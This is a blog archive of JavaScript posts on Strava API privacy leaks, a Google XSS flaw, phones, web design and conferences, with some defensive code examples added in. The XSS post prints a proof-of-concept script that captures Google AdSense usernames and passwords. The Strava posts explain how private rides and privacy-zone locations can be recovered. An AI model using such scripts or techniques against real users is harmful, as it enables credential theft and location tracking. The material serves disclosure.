Archive for the 'Javascript' Category

Strava “API” and privacy leaks.

Monday, July 8th, 2013

I previously had some pages which used the Strava API to do useful things for me. The one I used most showed who rode climbs together: it used the API to see everyone who rode a segment and then tracked their start times, so you could see who was riding with whom. It was also really useful for seeing changes in time between groups in a race, i.e. the break started a lap 2 minutes ahead and then the next lap only 1 minute.

Strava killed their previous API though, and despite an initial promise from them that I would have access to their new API if I agreed to remove their embarrassing GPX export service which revealed the private zones of people’s rides, I never got access; they just stopped emailing. (The privacy flaw was in their export, not in anything I did…).

I’m stuck here now without access to the useful features, so I’ve started looking for a replacement. I don’t have access to their new APIs, and in fact I don’t think I’d bother investing the time in them anyway, once bitten… But I started looking at the services they use to populate the pages themselves. One thing hits me immediately: the API their own pages use allows access to private activities.

Accessing private activities

Here’s a private run of mine; you won’t be able to see it, however here’s a JSON file of the exact run. So as long as you know the ID of a user’s ride, you can get all the info about it. It also completely ignores the privacy zones you have configured when exporting a private ride. Here is a public version of the same run as the last one; this has a privacy zone (it’s only hiding a sports club which is the start for these races, it’s not my house!) and you can see from exporting this one that the points within the privacy zone are reset to 0,0 rather than the actual lat/lon. Yet on the fully private activity, those same points were available: private activities actually present more risk of revealing your location than public ones.

Private rides are just security through obscurity, and the IDs aren’t even that obscure: don’t give Strava data that you actually want private.

Distances within privacy zones are provided

Another privacy flaw here is that while the lat/lons on public rides in your privacy zone are hidden, the distances you travel for each of those points in the private zone are not, so it’s a pretty easy algorithm to get back very close to the start of your ride/run unless you do some laps inside your zone or something similar to obfuscate it. Altitude is also provided for the points within the zone, so that may reveal more for those of you who don’t live in flat lands.
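For both leaks above (private activities exported with the zone intact, and public ones that zero the lat/lon but keep per-point distance and altitude), the fix on the exporting side is to drop every point inside the zone outright and to stop the cumulative distance from counting anything travelled inside it. The following is an added example of such a redaction step; it is not Strava’s code, and the point shape `{lat, lon, alt, dist}`, the zone shape and the sample track are assumptions constructed for illustration.

```javascript
// Added example (not Strava's code): redacting a privacy zone from an
// exported track without leaking distance or altitude inside the zone.
// Point shape {lat, lon, alt, dist} and zone shape {lat, lon, radiusM}
// are assumptions for this illustration.

const EARTH_RADIUS_M = 6371000;

// Great-circle distance in metres between two lat/lon pairs (haversine).
function haversineM(lat1, lon1, lat2, lon2) {
  const toRad = (d) => (d * Math.PI) / 180;
  const dLat = toRad(lat2 - lat1);
  const dLon = toRad(lon2 - lon1);
  const a =
    Math.sin(dLat / 2) ** 2 +
    Math.cos(toRad(lat1)) * Math.cos(toRad(lat2)) * Math.sin(dLon / 2) ** 2;
  return 2 * EARTH_RADIUS_M * Math.asin(Math.sqrt(a));
}

function inZone(p, zone) {
  return haversineM(p.lat, p.lon, zone.lat, zone.lon) <= zone.radiusM;
}

// Returns a new track: every point inside the zone is dropped entirely
// (no 0,0 placeholder, no altitude, no distance) and the cumulative
// distance is recomputed so that any segment touching the zone adds
// nothing. A reader of the export cannot add up hidden distance to walk
// back towards the zone centre, and re-entering the zone mid-ride leaves
// no jump in the distance column either.
function redactPrivacyZone(points, zone) {
  const out = [];
  let visibleDist = 0;
  for (let i = 0; i < points.length; i++) {
    const p = points[i];
    if (i > 0) {
      const prev = points[i - 1];
      const segmentHidden = inZone(prev, zone) || inZone(p, zone);
      if (!segmentHidden) visibleDist += p.dist - prev.dist;
    }
    if (inZone(p, zone)) continue;
    out.push({ lat: p.lat, lon: p.lon, alt: p.alt, dist: visibleDist });
  }
  return out;
}

// Constructed samples: a made-up club at 51.5,-0.1 with a 500 m zone,
// moving due north; 0.001 degrees of latitude is roughly 111 m.
const SAMPLE_ZONE = { lat: 51.5, lon: -0.1, radiusM: 500 };

// Run that starts inside the zone and leaves it.
const SAMPLE_START_IN_ZONE = [
  { lat: 51.5, lon: -0.1, alt: 20, dist: 0 },
  { lat: 51.501, lon: -0.1, alt: 21, dist: 111 },
  { lat: 51.504, lon: -0.1, alt: 22, dist: 445 },
  { lat: 51.51, lon: -0.1, alt: 25, dist: 1112 },
  { lat: 51.52, lon: -0.1, alt: 30, dist: 2224 },
];

// Run that starts outside, passes through the zone and comes back out.
const SAMPLE_REENTRY = [
  { lat: 51.52, lon: -0.1, alt: 30, dist: 0 },
  { lat: 51.51, lon: -0.1, alt: 25, dist: 1112 },
  { lat: 51.5, lon: -0.1, alt: 20, dist: 2224 },
  { lat: 51.51, lon: -0.1, alt: 25, dist: 3336 },
  { lat: 51.52, lon: -0.1, alt: 30, dist: 4448 },
];

console.log(redactPrivacyZone(SAMPLE_START_IN_ZONE, SAMPLE_ZONE));
console.log(redactPrivacyZone(SAMPLE_REENTRY, SAMPLE_ZONE));
```

The first retained point is always on or just outside the zone boundary, which is inherent in any export that shows the rest of the ride; what the export must not do is hand over the distance and altitude samples that let a reader measure from that boundary point back to the start.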

Strava Lack of time?

Strava have repeatedly said their reason for not supporting old APIs or for not providing access to the new API is lack of time. I guess I can now believe this, as they don’t even appear to have the time to invest in basic honouring of their privacy assurances. I did try emailing them before publishing this, and then tried Twitter, but still no response.

Exporting GPX from Strava

Monday, September 5th, 2011

I knocked up a Greasemonkey script to get GPX routes out of Strava, to help you know exactly where the segments start and finish. The script lets you export GPX rides and segments from Strava. At the moment it’s very rudimentary, with just the route being created. It would be quite easy to add way markers or course points to it to highlight when you were approaching the start or finish of a segment, but for now I just kept it super simple.

Don’t serve JSON as text/html

Wednesday, July 5th, 2006

Another day, another XSS flaw, this one in Google again, but this one is a little more interesting than the normal ones: what it shows is how JSON results add an extra attack vector that might be missed by your QA team.

The problem here was that the JSON was returned with a MIME type of text/html; a browser will render that as if it were an HTML page, even if it’s really just a JavaScript snippet. The easiest way to protect against these is to ensure that all JavaScript received by the XMLHttpRequest object is returned with a suitable MIME type, application/json. That will mean that even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.
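As an added example (not Google’s code, and not from the original post), here is the difference between the two responses in plain JavaScript. The response objects are simple `{status, headers, body}` records, an assumption for illustration rather than any particular framework’s API. Beyond the MIME type the post recommends, the hardened version also sets `X-Content-Type-Options: nosniff` and escapes the HTML-significant characters inside the JSON with `\uXXXX` sequences, so that even a copy that is mis-served as text/html contains nothing an HTML parser would treat as markup.

```javascript
// Added example (not Google's code): a JSON response that cannot be
// rendered as HTML. Response shape {status, headers, body} is an
// assumption for illustration.

// Escape the characters an HTML parser cares about using JSON's own
// \uXXXX form; the result is still valid JSON and parses to the same value.
function jsonSafeForHtml(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// The weak response from the post: correct JSON bytes, wrong MIME type,
// so a browser navigating to the URL renders any markup in the data.
function leakyJsonResponse(value) {
  return {
    status: 200,
    headers: { "Content-Type": "text/html" },
    body: JSON.stringify(value),
  };
}

// The hardened response: declared as JSON, content sniffing disabled,
// and markup characters in the data escaped as a second line of defence.
function jsonResponse(value) {
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: jsonSafeForHtml(value),
  };
}

// Constructed sample of untrusted data echoed back to the caller:
// a search term that happens to contain markup.
const SAMPLE_RESULT = { query: "<b>hello</b> & more", hits: 0 };

console.log(leakyJsonResponse(SAMPLE_RESULT).body);
console.log(jsonResponse(SAMPLE_RESULT).body);
```

Only the hardened form is safe to navigate to directly; the escaped body still round-trips through `JSON.parse` to the original string, so the XMLHttpRequest caller sees no difference.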

The Google exploit was reported here; at the time of writing it is unpatched. Unfortunately that was down to the discoverer not giving Google any time to fix it; whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously; they recently gave a presentation to the QA team that you can watch on Google Video.

As I’ve said before, putting everything on a single domain causes problems: it means any exploit anywhere on the domain allows you to exploit any service provided for the domain. This exploit is also present on https:// Google, so to reinforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing, here’s a simple demonstration of using the exploit to steal the username and password from Google AdSense.

The exploit is simply used to create an IFRAME that fills the document and points it to a Google AdSense login; when the user logs in, the username and password are alerted, and after logging in, the “today’s earnings” are alerted too. Of course a real attacker would not alert these fields, but would send them off to a site to be collected later. Are Google AdSense passwords useful? Would you notice if the address or account the cash goes to had changed until you didn’t get the cheque?

The script code is simple, you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></div>";

function go() {
  try {
    var win=window.frames[0];
    win.document.body.style.overflow="hidden";
    win.document.body.style.border="0px solid white";
    var doc=win.frames[0].document.forms[0];
    doc.onsubmit=function() {
      alert("Your adsense username and password are:\n"+
        doc["Email"].value+'\nand\n'+doc["Passwd"].value);
      x=window.open(location.href);
    }
  } catch (e) {
    try {
      var win=window.frames[0];
      var doc=win.document.body;
      var x="Today's Earnings:"+doc.getElementsByTagName('h1')[0];
      alert(x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
    } catch (e) {}
  }
}

The result is clear:

From Shiny to Orange…

Friday, August 5th, 2005

Fresh from my shiny experiences, I’ve now joined the Orange people. T-Mobile, who I’d happily used for years, finally sent me too many spam text messages, so I had to leave. I chose Orange, thanks to some lobbying from a friend who wanted to go to the cinema (Orange Wednesday gives customers 2 for 1 cinema tickets for a 10p SMS charge), and someone else recommended the deal available.

It’s a good deal, and now as well as my Nokia 1100, I have a Nokia 6680. It’s a videophone, so I made my first video call, and completely pointless it was too: I had to get dressed to make it, I had to look at the screen rather than wander around the room, and the quality wasn’t good enough if someone was trying to show me something actually interesting. It’s unlikely I’ll ever make another video call…

The most annoying thing about the 6680 though is that it interferes with the audio on the TV when it’s being used. It’s a cheap TV, but GSM phones don’t cause it any problems, and the 6680 in GSM mode doesn’t cause it a problem either. I think other than when I’m using data, I may well keep the 6680 in GSM only mode: the battery life is miles better, and it doesn’t interfere with anything. I certainly wouldn’t recommend 3G for anyone else; stick with the cheaper GSM phones, smaller, neater, better battery life, and more reliable. The 6680 also comes with no games, not even Snake, which has depressed me about Nokia. It looks like they’re pandering to the networks to encourage more people to buy downloaded games; they should remember who their real customers are.

Opera 8.0 and wireless IRC have been installed and are working nicely though. The Symbian Opera 8.0’s JavaScript support looks really good, and the XMLHttpRequest object works nicely, with all the examples, including the newly added one, working well.

Wot no body { background-color:white; } ?

Sunday, July 24th, 2005

Yesterday I had a good day at OpenTech, which was good fun, and met lots of interesting folk, but I missed an opportunity to ask a Yahoo Search bod, Jeremy Zawodny, why their search site didn’t bother setting a background colour. So instead, I’m going to start what’s hopefully not a regular look at sites which fail…

All of the major brands on the web other than Amazon failed to do the most basic QA on their sites, and all of them suffer from developers who don’t really know the common pitfalls of designing. I don’t know why this is, but please sort it out; it really looks bad for your brand. Go back to your style guides, and read the bit where it says white backgrounds…

The RTW Ticket Route Planner again

Sunday, June 19th, 2005

As I didn’t bother linking to the route planner last time, I thought I’d mention it again. So here’s a link to my Round The World Route planner.

Starting a new project

Saturday, June 11th, 2005

Scene: A typical office, two people Bob the project manager, and Jim the javascript muppet.

Bob: So Jim, we’ve got another project needing a thin client frontend to run on the desktops here, perfect for another of your HTML weblike frontends.
Jim: Oh cool, I’ve been wanting to try out XForms for that.
Bob: XForms? what are they then, I thought HTML, CSS and javascript was what you did?
Jim: Yeah but I’ve heard about these new things called XForms, apparently they make everything more semantic and easier to maintain.
Bob: You’ve heard? you realise we only have three weeks development in the schedule?
Jim: Oh I’m sure it’s simple, I met a guy in a pub who told me how easy it was, I’m sure I can pick it up.
Bob: Okay, if you’re sure the benefits are worth it, this will work with all our current desktops right?
Jim: Well we’ll need to roll out a new XForms client to all of them.
Bob: Ah, so which client do we use?
Jim: Well, there’s lots to choose from, I’ve heard there are more XForms clients when the standard came out than anything else, so it must be good?
Bob: So which is the best?
Jim: I dunno, give me a few days research time and I’m sure one will turn up.
Bob: So how much is that going to cost us?
Jim: I dunno, There doesn’t seem to be pricing info for most of the XForms players, still the beancounters aren’t doing much at the moment, they can find that out.
Bob: Hmm, but there’s plenty of examples of other people using these XForms in web solutions for us to learn from, right?
Jim: Not that I’ve found, but there’s a specification.
Bob: Okay… If you get hit by a bus, there’s plenty of other people out there we can hire with the skills to maintain it though?
Jim: Don’t think so, but I’m sure it’d be easy for them to learn it too.
Bob: So, let’s recap. Instead of using the tools we’ve used to successfully roll out tens of projects and people millions, you want us to pick a new technology you know nothing about, with immature implementations that we don’t know the cost of and will need to roll out to every desktop, and there’s few examples to learn from. Then, even when you’ve written it, we won’t be able to easily hire someone to maintain it as the skills are rare, and you don’t think the risk to the project is too high?
Jim: Sure, it’ll be fine, I need to learn the technology sometime right?

Bob walks away and picks up the phone.
Bob: Harry, call up HR, we need a new javascript muppet, this one’s gone a bit crazy.

The disappearance of the background colour

Thursday, December 30th, 2004

A long time ago, the web’s background colour was a really quite ugly shade of grey, and all was good with the world, as everyone remembered to set the background colour to what they wanted. Now of course the background colour is white, and no-one remembers. To remind me to always do it, and to make plain text and XML files easier to read in my browser, I set mine to a nice mellow yellow colour. This means I now see so many sites with weird colours, and not crappy little personal sites, but big corporate sites with big web budgets, but obviously no QA. Searching for “com” in Google should return some of the major sites on the web today, and what do we see? Yahoo without a background colour… Other sites I’ve noticed recently are Citibank, AOL and EasyJet.

I’m sure many of these sites spent thousands just on the meetings to pick their brand colours, and then they go and ruin it by not setting the background white? Quite apart from the risk of people having a background colour that doesn’t play nicely with the text colours they chose.

Google have finally fixed it.

Wednesday, October 20th, 2004

Google seem to have finally fixed the flaw sometime around 6am today. Not bad, it only took them a little over 2 years, so it’s good to know they’re responsive. Actually it seems from the logs that it made it into the Google bug tracking system around 4pm yesterday, so 14 hours from then to fully rolled out is actually quite impressive; what’s not impressive is the failure of the security@google.com address and the lack of any phone numbers to contact them.

Google did eventually get in contact with me by email at around 7PM yesterday, 3 hours after they knew about it and an hour after the bugtraq posting. They didn’t seem to be overly concerned and claimed “to be aware of the issue”, which combined with their lack of thanks for me drawing their attention to it suggests that it was actually a known bug they’d just neglected to fix. They said they’d look into why my security@google.com emails failed to elicit a response, but seemed mostly concerned about getting me to take the exploit page down. I declined that request; it didn’t seem worthwhile, as the exploit had by then been mentioned on lots of other sites, so it would’ve done nothing to aid security.

The fix they put in place is still flawed: it relies on special casing the vbscript, javascript and perlscript strings, meaning other language protocols are still at risk in IE with its multiple scripting language capability. The risk is obviously much lower, as very few people have other scripting handlers registered, but it could still be used as a vector to attack a corporate installation with known other script engines. What I don’t understand is why, instead of blacklisting various strings, they don’t just require it to start with http://. What other protocols do you want in an image on a customised Google?
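As an added example (not Google’s code, and not part of the original post), the two approaches side by side in JavaScript: the blacklist of named script protocols as the post describes it, and an allowlist that parses the value with the standard URL parser and accepts only http: and https:. The `otherscript:` scheme in the sample inputs is a placeholder standing in for any additional script engine a corporate desktop might have registered; the function names are mine.

```javascript
// Added example (not Google's code): validating a user-supplied image URL.
// Function names are mine; "otherscript:" below is a placeholder for any
// extra script engine registered on a desktop, not a real scheme.

const ALLOWED_IMAGE_SCHEMES = new Set(["http:", "https:"]);

// Blacklist, as described in the post: rejects the three named handlers
// and lets every other scheme through.
function isSafeImageUrlBlacklist(raw) {
  const lower = raw.trim().toLowerCase();
  return !["javascript:", "vbscript:", "perlscript:"].some((prefix) =>
    lower.startsWith(prefix)
  );
}

// Allowlist: parse with the WHATWG URL parser (built into Node.js and
// browsers), which lower-cases the scheme for us, then accept only
// http(s). Anything the parser cannot make absolute sense of is rejected.
function isSafeImageUrlAllowlist(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return false; // relative paths and unparseable input are not accepted
  }
  return ALLOWED_IMAGE_SCHEMES.has(url.protocol);
}

// Constructed sample inputs: what a customised-page image field might
// receive, with the result each check should give.
const SAMPLE_URLS = [
  "http://example.com/logo.png",
  "https://example.com/logo.png",
  "javascript:void(0)",
  "VBScript:Nothing",
  "perlscript:nothing",
  "otherscript:nothing", // placeholder for an unlisted script engine
  "ftp://example.com/logo.png",
  "logo.png",
];

for (const u of SAMPLE_URLS) {
  console.log(
    u.padEnd(32),
    "blacklist:", isSafeImageUrlBlacklist(u),
    "allowlist:", isSafeImageUrlAllowlist(u)
  );
}
```

The difference shows on the placeholder scheme: the blacklist has no opinion about it and passes it, while the allowlist rejects it without anyone having to know the engine exists. Requiring http(s) is also a single rule to review, whereas a blacklist has to be revisited every time a new handler turns up.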

Hopefully Google will get in touch and explain what went wrong with the communication of the issue, and hopefully Google will realise that a phone number for the security team on the web would also help. (After trying to explain to Tesco customer support a few years back that there was a non-SSL credit card collection problem and getting absolutely nowhere, I’m not going to call normal people with security issues; they don’t understand them.) I don’t actually expect them to get back in touch though; they weren’t exactly friendly. Perhaps not surprising, as to them it seemed I went public before informing them, but with a trivial hole that’d been there for 2 years, I had to do something to get it fixed.

The talks that didn’t happen…

Monday, September 13th, 2004

I’m going to do a full write-up of the conference some time soon, but while I remember, here’s a few of the talks I wanted to see but didn’t get a chance to, as the presenters couldn’t make it.

Up first, as I mentioned, was Locus (PDF report). Hopefully we can get the source code for it, as it’d be great to run this at SVG Open 2005, where the university is covered in wireless. It would have been even more helpful here in Japan, where the lack of phones (for us visitors) made meeting people all the harder. We had IRC though.

Jonathon Phillips was meant to talk about the Open Clip Art Library. I’d not really looked at the library before, but it’s great: a really high standard of artwork with lots that I can actually see using.

I’m sure there were lots I should’ve seen that did happen, but I spent my time in other rooms; I’ll write up the highlights of the ones I did see soon.